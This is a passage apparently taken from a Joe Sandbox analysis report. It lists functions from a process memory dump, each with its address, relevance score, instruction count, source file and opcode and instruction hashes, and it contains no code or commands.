                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e5ead20b309856dd19586ff727b70e7b483dbf8e785ea663d4418cb098421a9
                                          • Instruction ID: 3241530eca5bd57b8cf587f801d9f2227f73e42507f3e6511450c7854e300567
                                          • Opcode Fuzzy Hash: 6e5ead20b309856dd19586ff727b70e7b483dbf8e785ea663d4418cb098421a9
                                          • Instruction Fuzzy Hash: 8811A0362606C6AFDB2AEF5DD841B567FA8EB85B64F484119FA048B250C3B0F850CF60
                                          Function 01374B00 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2173c153dde4e2604f7cf4c1b49c7ec04c797a0329c5e6245d8937260bbbe2dc
                                          • Instruction ID: 6c6377aa3c75756e1894f3ca1e79a6690eadad51056e75e25bae074920218316
                                          • Opcode Fuzzy Hash: 2173c153dde4e2604f7cf4c1b49c7ec04c797a0329c5e6245d8937260bbbe2dc
                                          • Instruction Fuzzy Hash: EE11C2362006159FDB32DA6DD840F76B7AAFFC4754F154529EA8287690DB38BC06CB90
                                          Function 012D6620 Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 395beb1443d3c078ca89ee1bac838770d7de6c5f0c142fd46b3a3df4c71ea1ed
                                          • Instruction ID: 188d48c14c0685fedbd8019e3b10d437ce2f97c17ecf87e4c1dbe2fe658c7c80
                                          • Opcode Fuzzy Hash: 395beb1443d3c078ca89ee1bac838770d7de6c5f0c142fd46b3a3df4c71ea1ed
                                          • Instruction Fuzzy Hash: D611A176A10716AFDB22DF99C9C0B6EFBB8FF84750F500459EB01A7200D735AD418BA0
                                          Function 012CE53E Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction ID: d5ad54f2c2e3afd8b30966254456e1da996df05bf4c136a375413b6d7d236e00
                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction Fuzzy Hash: D611E5712216C29BE7339B2CD9A4B653BD8BF51BC8F1A04A4DF418B682F338C842C650
                                          Function 0132E75D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction ID: 40cce001b63300515bedf167ade0f45b010e2280f746f7b852dc1108506b8740
                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction Fuzzy Hash: 5B01F532600125AFEB25AF5DCC02FAA7FA9EF40758F158034EA059B270E771DD40CB90
                                          Function 0129A250 Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction ID: 328bfcf57a8951ceffafa1c3cd87ceca21f2164e2e5274f7d621a7016d58238e
                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction Fuzzy Hash: C001C072925B229BCF218F1DDC40A767BB5EB55B607008AADFA958B681D731D800CBA0
                                          Function 01374940 Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a238366fa3b924683e3a0daf106d67fdd44cdc08c4dcf834d7ca4c178324f7c
                                          • Instruction ID: f184830997f3531e4cd99cd831f52507cad064f4a04f771ecfcacf43f9c5c05d
                                          • Opcode Fuzzy Hash: 1a238366fa3b924683e3a0daf106d67fdd44cdc08c4dcf834d7ca4c178324f7c
                                          • Instruction Fuzzy Hash: 8401F973551611AFC332DF1CD880E62B7A8EB92778B164255E9689B1D6E734FC01CBD0
                                          Function 0131E1D0 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f493a6ddf2c0518d39b3254413c81897b9d6a0c647cae827be0bd1477fe52f5
                                          • Instruction ID: 1c85a8fdce5ed540035fd76e165cc9b9f32ffdc0d396f7e642667a15bcd24185
                                          • Opcode Fuzzy Hash: 0f493a6ddf2c0518d39b3254413c81897b9d6a0c647cae827be0bd1477fe52f5
                                          • Instruction Fuzzy Hash: 9011AD32251241EFDB16EF19CD91F66BBB8FF58B88F200075EE059B6A1C235ED01CA90
                                          Function 012A6259 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a583b8b4de188dd73906cfde253117b66b4e97476c755295c61769a5615aab6e
                                          • Instruction ID: a598eb795d1d4d7c10cae311e9b010fede79f4bf7fc6bc4c9716a18478d666e5
                                          • Opcode Fuzzy Hash: a583b8b4de188dd73906cfde253117b66b4e97476c755295c61769a5615aab6e
                                          • Instruction Fuzzy Hash: DB117071951219ABEF25EB64CC46FE973B8BF14710F9041D8A315A61E0E7709E81CF84
                                          Function 01326050 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc9d60ce1531173c79779cf2e84af9123ed948e8d1229155142c2cdbdcf9bf2b
                                          • Instruction ID: 681732912bf2ce45dfe7ae6728b89ababc854b1b7b1f1a50d2f20ecafb4827fe
                                          • Opcode Fuzzy Hash: dc9d60ce1531173c79779cf2e84af9123ed948e8d1229155142c2cdbdcf9bf2b
                                          • Instruction Fuzzy Hash: C5111BB2900019ABCB12DB94CC84DEF777CEF48358F044166E906A7211EA34AA55CBA0
                                          Function 012A208A Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction ID: 32f3347674585b6d27aeb3b35fa9a7fd873211019fffc429ad02dcbeb7c0f178
                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction Fuzzy Hash: 5A01F533220212CBEF118A5DD880BA2B767BFE4700F9545A9EE018F246DAB1D881C390
                                          Function 01336500 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a77b659407ae453021bf5f4fc8a7eab4521a3b520f739af07f4d709251da14bd
                                          • Instruction ID: 26a5390473f433139774565b273a4ad9514506826443dae35f77b64d60e29218
                                          • Opcode Fuzzy Hash: a77b659407ae453021bf5f4fc8a7eab4521a3b520f739af07f4d709251da14bd
                                          • Instruction Fuzzy Hash: 84110872600145EFD701CF18C400BA1B7B9FB96308F088169E844CF355D732ED80CBA0
                                          Function 0132C810 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 69702b0d4badc1da432d66f51d66accede9e5b36a154291e98247cdcf439a107
                                          • Instruction ID: 1b370995a38e7a5de6f6d911d61dff4879b8edbb12e34204e26a37418476989f
                                          • Opcode Fuzzy Hash: 69702b0d4badc1da432d66f51d66accede9e5b36a154291e98247cdcf439a107
                                          • Instruction Fuzzy Hash: F2111CB1A102199BCB00DF99D585AAEBBF8FF58350F10806AE905E7351D674EA018BA4
                                          Function 0129C020 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction ID: d4cba95c3ff8daa9ac47f0cee4e52438722a44190ae495f021e030a6d8854bb4
                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction Fuzzy Hash: 9301B53212074A9FEF2296AED844BA7B7E9FFC5654F04482DE7468B540DA74E501C750
                                          Function 012E20F0 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d67c53066708a76106d296476b8c50c535afec2ee4f285c22bad592a43baac3
                                          • Instruction ID: a86a5fde13799a61f2a44228525ddbdc5e1e673ca76894c7d624a9398757a0f6
                                          • Opcode Fuzzy Hash: 8d67c53066708a76106d296476b8c50c535afec2ee4f285c22bad592a43baac3
                                          • Instruction Fuzzy Hash: 69116935A1124DEBCF05EFA8C855FAE7BB9EB44784F404069E9029B290DA35EE11CB90
                                          Function 012DE5CF Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63121f10210fa5d87c50ccb7d685220e912d0b06619149f9b9585ee6005c259d
                                          • Instruction ID: f4d6aaab7af054cd009014f15eb4f83faf3606d815a233e9b74087edc90719ae
                                          • Opcode Fuzzy Hash: 63121f10210fa5d87c50ccb7d685220e912d0b06619149f9b9585ee6005c259d
                                          • Instruction Fuzzy Hash: 8B01D4B1221A05BBC715AB69CDC4EA3BBBCFB557A47000629B10587550DB24FC01C7A0
                                          Function 013369C0 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43bf985ceea7ad6d6da8232a29ed1f5e469fe16d7e2851c1a3d6c6efb20f6770
                                          • Instruction ID: 014dfdd135738dfe78a8b18d0b1d5930b60ef24b4f507ac8b64e9be836d2868f
                                          • Opcode Fuzzy Hash: 43bf985ceea7ad6d6da8232a29ed1f5e469fe16d7e2851c1a3d6c6efb20f6770
                                          • Instruction Fuzzy Hash: D5014CB2224206AFD320DF6DC8899B7FBECFF88764F104129E95987180E7309A12C7D5
                                          Function 0132C460 Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1cdfade60a7f7d80cfadee560fab48c945a7d21cef5b6168018cc93051a72a10
                                          • Instruction ID: fbaba8d6b0a8499eae9138109f91494ed7ab6623261d347beb3d7639260aca52
                                          • Opcode Fuzzy Hash: 1cdfade60a7f7d80cfadee560fab48c945a7d21cef5b6168018cc93051a72a10
                                          • Instruction Fuzzy Hash: FD116971A0025DEBDF15EFA8C894EAEBBB9FB48744F004059FD01A7380DA35EA11CB90
                                          Function 0132C97C Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e05da1b5652e3fdd11418d8263ee5e7ceefc585adf0679e3fa1a557c77adc4f
                                          • Instruction ID: 8f11dc710bdc2b24912ce85e04e69a48e552346c8430bef7c459d12c0634d2b9
                                          • Opcode Fuzzy Hash: 6e05da1b5652e3fdd11418d8263ee5e7ceefc585adf0679e3fa1a557c77adc4f
                                          • Instruction Fuzzy Hash: D01179B16183099FC700EF69D48199BBBE8FF98710F00495AF998D7390E630E900CB92
                                          Function 012BE016 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction ID: 70e47b19c75e21c42976d0195df1f949c6a2d0d732e69aa9c56d01eeb74c6fdf
                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction Fuzzy Hash: FC01DF32224581DFE722871DC988FA6BBE8EF44784F0E08B5FB05DB691C678DC80C221
                                          Function 0129826B Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbbd4734dd1cf6d5f3740d4fba636411f1273c3353301c7c251c98789094fbe6
                                          • Instruction ID: 14694200e39bc3a5bc22784f4c662bd89f35dd91df9c087292b96883b2d645e2
                                          • Opcode Fuzzy Hash: fbbd4734dd1cf6d5f3740d4fba636411f1273c3353301c7c251c98789094fbe6
                                          • Instruction Fuzzy Hash: 8E01DF31A205499BDB14EB6DD9449BEB7A9EF82214F1940A9DA01E7280DE30DC01C690
                                          Function 0134EB50 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2beea826859af8bf03adb146310f68df985e979083b1733f84e885e2a1c92aeb
                                          • Instruction ID: 9f6fc63c13e089f7a3a8fe730fcc8d70f6f7bf543fc5dd94f2662e6394883ae1
                                          • Opcode Fuzzy Hash: 2beea826859af8bf03adb146310f68df985e979083b1733f84e885e2a1c92aeb
                                          • Instruction Fuzzy Hash: A801F2B1244711AFE3315F19D841F56BAE8EF54B94F00082EB3069F390C6B6A8408B64
                                          Function 012A2582 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90760b8379bcc82a84853f881e9c91b82d446bdecd9d58aed7d99e2459d581d6
                                          • Instruction ID: 00d65bada10dc5fcbecf08cd72473bebf9a1dbdb9347b499fc92b0a63673b8bc
                                          • Opcode Fuzzy Hash: 90760b8379bcc82a84853f881e9c91b82d446bdecd9d58aed7d99e2459d581d6
                                          • Instruction Fuzzy Hash: F8F0F432651B11F7C736DB5ADD40F57BBAAEB84B90F004028E60597640DA30ED01CBA0
                                          Function 012CC073 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction ID: c7364f8e047f5a0bd2ebd80b825de76e07f4be708dc0575fe3551ecf8d9c8d2a
                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction Fuzzy Hash: BCF062B2600A15ABD325CF4DDC40E67FBEADBD5A90F058129A659DB220EA31ED05CB90
                                          Function 0129C310 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction ID: a7bd80701135cbb2349668976a52144b2775277247ffd9beb0bf34e5f6c40ce8
                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction Fuzzy Hash: 4FF021332746739BDF32575D4840B7BA5958FD5B64F190035F30D9B244C9B08D1157D4
                                          Function 0137634F Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0dcef275b91899488704510f5f0ded4e9dc15f2861abe102c63a7c04e2d48dd
                                          • Instruction ID: 6ae00424fc53cf3fd366631b3661dc3fe87e5f013481fc68ce7175dc1343404c
                                          • Opcode Fuzzy Hash: b0dcef275b91899488704510f5f0ded4e9dc15f2861abe102c63a7c04e2d48dd
                                          • Instruction Fuzzy Hash: C8018471A1020DEFDB00DFA9D8919AEB7F8FF58304F10405AF900E7350D6349A00CBA0
                                          Function 0137625D Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ee053e3576a550e981cf21f582d5459830dcec309a8f92ac3607156893545e1
                                          • Instruction ID: 929340d68cef3874a34a6f9058c1158fffbbaf742e08494d4f65d87efaeb5e5b
                                          • Opcode Fuzzy Hash: 7ee053e3576a550e981cf21f582d5459830dcec309a8f92ac3607156893545e1
                                          • Instruction Fuzzy Hash: 9C018471A1020EEFDB04DFA9D4919AEB7F8FF58304F10405AF904E7350D6749A00CBA0
                                          Function 013762D6 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ce77d7943236b6acf27e846e86964b6455c1e52b48963b690fd72a27ad85700
                                          • Instruction ID: 47969cbf8ede1dd500840785bbb18ef1021ec84b9c88f3bbc611dc70a0e50fd7
                                          • Opcode Fuzzy Hash: 7ce77d7943236b6acf27e846e86964b6455c1e52b48963b690fd72a27ad85700
                                          • Instruction Fuzzy Hash: 890171B1A10209AFDB00DFA9D4559AEBBF8FF58304F50405AE901E7350D6749A00CBA0
                                          Function 013761E5 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 082187d8e3a9ef445d34714ecbaffe9dbade791e195f16373c3615812e3f30d4
                                          • Instruction ID: 55503f40cd82664c10103f7c85a7c0003635d0d3bd538d26e9fe72ce931d5e06
                                          • Opcode Fuzzy Hash: 082187d8e3a9ef445d34714ecbaffe9dbade791e195f16373c3615812e3f30d4
                                          • Instruction Fuzzy Hash: AA018F71A10249ABDB00DFA9D855AEEBBF8BF58314F14005AE500E7280D734EA01CB94
                                          Function 013263C0 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                          • Instruction ID: f76b9a71affafff79ed1f5c9f62d531cc1845df270c6646f0365b7cd9b17a2a7
                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                          • Instruction Fuzzy Hash: B0F0497220001DBFEF01AF94CD80DEF7B7EEF58698B104124FA10A2120D231DD21ABA0
                                          Function 0132A4B0 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8fb6e4d6d748a9498d9b20f383e0ce592e4ebde8009a7dd8b3b1e250018e432d
                                          • Instruction ID: 9df3f776fce107e1aade13a032cc1888a7fe7a37f7cf1e6e6f0f8fe92c74934e
                                          • Opcode Fuzzy Hash: 8fb6e4d6d748a9498d9b20f383e0ce592e4ebde8009a7dd8b3b1e250018e432d
                                          • Instruction Fuzzy Hash: 38018536100219EBCF12AE84D840EDA7F6AFB4C768F068205FE1866620C336D970EB81
                                          Function 0129C0F0 Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e932ce43583d070f9a09e8202a861c3741de8e9b796c43db53b28bf00f3ec072
                                          • Instruction ID: 915d2672f581aaa7e29ecb0017b4bc32be5a89e807ac826fe01af6ca55e5ce08
                                          • Opcode Fuzzy Hash: e932ce43583d070f9a09e8202a861c3741de8e9b796c43db53b28bf00f3ec072
                                          • Instruction Fuzzy Hash: C1F0B4B22342425BFB54961D9C06F33369AE7D0751F65806AEB058B2D1EA71DC118798
                                          Function 012D656A Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe884dbc918884e4a2378995904d089a193a6ae6c2ce6ebe2dbc1dd287e26694
                                          • Instruction ID: aee942b2fab65f4f6a0c4898c3160cb225821833a96fabc02616b1da1082bfbe
                                          • Opcode Fuzzy Hash: fe884dbc918884e4a2378995904d089a193a6ae6c2ce6ebe2dbc1dd287e26694
                                          • Instruction Fuzzy Hash: FA01A470210682DBE3369B2CDD48B6537A8BB40B44F880590FA41CBADAE768D4828210
                                          Function 0134437C Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction ID: 5ff193e5f9c4097f0deb9142142cbece0e85c79e61ddcbf0d6dcc4488f126c05
                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
